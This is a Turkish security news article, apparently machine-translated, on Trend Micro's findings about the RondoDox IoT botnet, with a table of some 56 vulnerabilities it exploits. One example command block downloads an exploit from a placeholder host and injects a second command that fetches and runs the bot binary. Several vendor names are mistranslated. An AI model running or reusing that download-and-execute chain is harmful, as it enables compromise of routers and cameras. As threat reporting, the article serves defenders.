RondoDox Botnet, Yönlendiricilere, CCTV Sistemlerine ve Web Sunucularına Saldırmak İçin 50’den Fazla Güvenlik Açıkından Yararlanıyor


RondoDox Botnet, Yönlendiricilere, CCTV Sistemlerine ve Web Sunucularına Saldırmak İçin 50'den Fazla Güvenlik Açıkından Yararlanıyor

RondoDox, 2025’in başlarında ortaya çıkışından bu yana, tüketici yönlendiricilerinden kurumsal CCTV sistemlerine ve web sunucularına kadar çok çeşitli ağa bağlı cihazları hedef alarak hızla faaliyetteki en yaygın IoT odaklı botnet’lerden biri haline geldi.

Modüler tasarımı, operatörlerin 50’den fazla farklı güvenlik açığına karşı özel yararlanma modüllerini devreye almasına olanak tanıyarak farklı platformların hızla tehlikeye atılmasına olanak tanır.

Pek çok saldırı kampanyasında, saldırganlar açıkta kalan cihazları tespit etmek için otomatik taramadan yararlandı ve bunu hızlı bir şekilde yararlanma ve komuta-kontrol kaydı izledi.

Trend Micro araştırmacıları, birden fazla bölgedeki güvenliği ihlal edilmiş DVR cihazlarından kaynaklanan anormal trafik modellerini gözlemledikten sonra Nisan 2025’te RondoDox’u tespit etti.

Sonraki analiz, Go’da yazılmış, platformlar arası dağıtımı ve verimli ikili boyutu kolaylaştıran bir çekirdek motoru ortaya çıkardı.

Botnet’in komut protokolleri şifreli iletişimi destekleyerek ağ izleme altında bile gizli C2 değişimlerini garanti eder.

google

Başarılı bir şekilde yararlanmanın ardından RondoDox, cihazın yeniden başlatılmasından ve cihaz yazılımı güncellemelerinden etkilenmeyecek şekilde tasarlanmış hafif bir kalıcılık aracısını devreye alır.

Bu aracı, yeni veriler veya komutlar için C2 sunucularını periyodik olarak yoklarken, kendi kendini onarma rutinleri, kaldırılmışsa bileşenleri yeniden yükler.

Enfeksiyonlar sıklıkla cihazın büyük ölçekli DDoS saldırılarına katılmasıyla veya sonraki tehdit operasyonları için gizli proxy sunuculuğuyla sonuçlanır.

Enfeksiyon Mekanizması

RondoDox’un bulaşma zinciri genellikle, kötü amaçlı yazılımın tarama modülünün cihazları açık Telnet (port 23), SSH (port 22) ve HTTP yönetim arayüzleri için araştırdığı bir keşif aşamasıyla başlar.

Bir hedef belirlendikten sonra, kapsamlı veri havuzundan alınan uygun yararlanma yükü teslim edilir.

Örneğin, bir modülde tarayıcı, bir kabuk yükünü yürütmek için CVE-2021-20090 yönlendirici kimlik doğrulama bypassını kullanır: –

wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

İlk kod yürütülmesinden sonra veri, trafiğini meşru HTTPS olarak gizleyerek 443 numaralı bağlantı noktasında C2’ye şifrelenmiş bir TLS kanalı kurar.

Trend Micro analistleri, bu şifreleme planının özel bir sertifika paketine dayandığını ve bunun da müdahale ve inceleme çabalarını karmaşık hale getirdiğini belirtti.

İletişim kurulduktan sonra bot, ağ tarayıcıları veya DDoS araçları gibi ek modülleri talep eder ve doğrudan belleğe yükler.

Çok aşamalı enfeksiyon akışı, keşiften sömürüye ve kalıcılığa geçişi vurguluyor.

RondoDox güvenlik açığının zaman çizelgesi (Kaynak – Trend Micro)

Bulaşma mekanizmasını takiben RondoDox, Linux tabanlı DVR’lerdeki crontab girişleri veya belirli yönlendirici modellerindeki donanım yazılımı görüntüsü değişikliği gibi cihaza özgü kalıcılık tekniklerinden yararlanarak operasyonun devam etmesini sağlar.

Uyarlanabilirliği ve geniş istismar kitaplığı, bu gelişen tehdidi azaltmak için yama yönetimi ve ağ bölümlendirmesine olan acil ihtiyacın altını çiziyor.

Aşağıdaki tablo, CVE tanımlayıcıları, etkilenen ürünler, etki derecelendirmeleri, gerekli yararlanma önkoşulları ve CVSS 3.1 puanları da dahil olmak üzere RondoDox tarafından şu anda istismar edilen 50’den fazla güvenlik açığına ilişkin ayrıntılı bir genel bakış sunmaktadır.

# Satıcı / Ürün CVE Kimliği CWE / Tür Durum Notlar
1 Nexxt Yönlendirici Ürün Yazılımı CVE-2022-44149 CWE-78 (Komut Ekleme) N-Gün
2 D-Link Yönlendiricileri CVE-2015-2051 CWE-78 N-Gün
3 Netgear R7000 / R6400 CVE-2016-6277 CWE-78 N-Gün
4 Netgear (mini_httpd) CVE-2020-27867 CWE-78 N-Gün
5 Apache HTTP Sunucusu CVE-2021-41773 CWE-22 (Yol Geçişi / RCE) N-Gün
6 Apache HTTP Sunucusu CVE-2021-42013 CWE-22 N-Gün
7 TBK DVR’ler CVE-2024-3721 CWE-78 Hedefli
8 TOTOLINK (setMtknatCfg) CVE-2025-1829 CWE-78 N-Gün
9 Meteobridge web arayüzü CVE-2025-4008 CWE-78 N-Gün
10 D-Link DNS-320 CVE-2020-25506 CWE-78 N-Gün
11 Digiever DS-2105 Pro CVE-2023-52163 CWE-78 N-Gün
12 Netgear DGN1000 CVE-2024-12847 CWE-78 N-Gün
13 D-Link (çoklu) CVE-2024-10914 CWE-78 N-Gün
14 Edimax RE11S Yönlendirici CVE-2025-22905 CWE-78 N-Gün
15 QNAP VIOSTOR NVR CVE-2023-47565 CWE-78 N-Gün
16 D-Link DIR-816 CVE-2022-37129 CWE-78 N-Gün
17 GNU Bash (ShellShock) CVE-2014-6271 CWE-78 (Kod Ekleme) N-Gün / Tarihsel
18 Dasan GPON Ev Yönlendiricisi CVE-2018-10561 CWE-287 (Kimlik Doğrulama Baypası) N-Gün
19 Dört Katlı Endüstriyel Yönlendiriciler CVE-2024-12856 CWE-78 N-Gün
20 TP-Link Archer AX21 CVE-2023-1389 CWE-78 Hedefli
21 D-Link Yönlendiricileri CVE-2019-16920 CWE-78 N-Gün
22 İhale (FROMNETTOOLGET) CVE-2025-7414 CWE-78 N-Gün
23 Mağaza (cihazAdı) CVE-2020-10987 CWE-78 N-Gün
24 LB-LINK Yönlendiriciler CVE-2023-26801 CWE-78 N-Gün
25 Linksys E-Serisi CVE-2025-34037 CWE-78 N-Gün
26 AVTECH CCTV CVE-2024-7029 CWE-78 N-Gün
27 TOTOLINK X2000R CVE-2025-5504 CWE-78 N-Gün
28 ZyXEL P660HN-T1A CVE-2017-18368 CWE-78 N-Gün
29 Hytec HWL-2511-SS CVE-2022-36553 CWE-78 N-Gün
30 Belkin Play N750 CVE-2014-1635 CWE-120 (Arabellek Taşması) N-Gün
31 TRENDnet TEW-411BRPplus CVE-2023-51833 CWE-78 N-Gün
32 TP-Link TL-WR840N CVE-2018-11714 CWE-78 N-Gün
33 D-Link DIR820LA1 CVE-2023-25280 CWE-78 N-Gün
34 Milyar 5200W-T CVE-2017-18369 CWE-78 N-Gün
35 Cisco (birden fazla ürün) CVE-2019-1663 CWE-119 (Bellek Bozulması) N-Gün
36 TOTOLINK (setWizardCfg) CVE-2024-1781 CWE-78 N-Gün
37 Hikvision NVR’si Komut Enjeksiyonu CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
38 Dahua DVR Uzaktan Kod Yürütme CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
39 Wavlink Yönlendiricileri CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
40 ZTE ZXHN Yönlendirici CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
41 Seenergy NVR Kimlik Doğrulama Baypası CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
42 Uniview NVR CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
43 TP-Link TD-W8960N CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
44 Dahua IP Kamera CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
45 HiSilicon Aygıt Yazılımı Arabellek Taşması CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
46 Amcrest Kamera CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
47 Hikvision IP Kamera CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
48 LILIN Kamera CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
49 TP-Link WR941N CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
50 Wavlink WL-WN575A3 CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
51 Dahua NVR’si CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
52 Çadır AC6 CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
53 Hikvision DS-7108HGHI CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
54 LB-LINK BL-WR450H CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
55 ZTE ZXHN H108N CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir
56 Wavlink WL-WN531G3 CWE-78 CVE yok Trend Micro tarafından CVE olmadan listelenmiştir

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link